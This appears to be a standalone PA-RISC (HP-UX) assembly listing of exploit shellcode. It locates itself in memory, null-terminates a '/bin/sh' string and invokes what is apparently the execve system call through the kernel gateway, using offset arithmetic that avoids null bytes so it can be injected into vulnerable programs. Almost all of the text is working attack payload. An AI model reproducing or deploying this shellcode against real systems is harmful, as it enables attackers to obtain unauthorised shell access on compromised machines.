1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
.SPACE $TEXT$
.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
.align 4
.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
main
bl shellcode, %r1
nop
.SUBSPA $DATA$
.EXPORT shellcode; So we could see it in debugger
shellcode
bl .+4,%r1 ; address into %r1
addi 500, %r1, %r3;
stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
xor %r25, %r25, %r25; NULL ->arg1
ldi SHELL-shellcode-11-500, %r26;
add %r3, %r26, %r26;
ldil L%0xc0000000,%r1; entry point
ldi 500, %r22 ;
ble 0x4(%sr7,%r1) ;
subi 511, %r22, %r22 ;
SHELL
.STRING "/bin/shA";
endofshellcode
|
